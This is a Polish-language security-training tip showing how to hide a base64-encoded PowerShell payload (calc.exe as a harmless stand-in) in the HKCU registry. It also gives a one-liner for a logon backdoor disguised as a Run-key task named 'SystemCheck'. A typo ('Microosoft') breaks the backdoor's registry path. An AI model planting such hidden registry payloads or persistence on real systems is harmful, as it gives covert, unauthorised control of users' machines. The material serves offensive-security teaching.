alphasec academy

Zmień/stwórz nową wartość w rejestrze: sp HKCU:\Software\Microsoft\Windows Signature "YwBhAGwAYwA="

Dodatkowe informacje

Powyższy oneliner ustawi w rejestrze Windows dla subklucza w lokalizacji HKCU:\SOFTWARE\Microsoft\Windows wartość YwBhAGwAYwA= o nazwie Signautre.
W pełnej, zgodnej ze sztuką formie bez skracania, miałoby to postać:
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows" -Name "Signature" -Value "YwBhAGwAYwA="
Ten konkretny przypadek umieści zakodowany w base64 string calc.exe pod nazwą Signature, która domyślnie w tym subkluczu rejestru nie istnieje - posłuży nam to jako payload, który zostanie uruchomiony w protipie aptm.in/protip/0053.

Żeby na szybko wyświetlić jakie znajdują się wartości w danym subkluczu, możemy wykorzystać polecenie:
Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows"
lub w skrócie
gp HKCU:\SOFTWARE\Microsoft\Windows

Inne przykłady

Prosty backdoor pod przykrywką zadania o nazwie SystemCheck uruchamiający zakodowany w base64 payload Powershella po zalogowaniu:
sp HKCU:\SOFTWARE\Microosoft\Windows\CurrentVersion\Run SystemCheck "powershell -w h -enc YwBhAGwAYwA="

Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.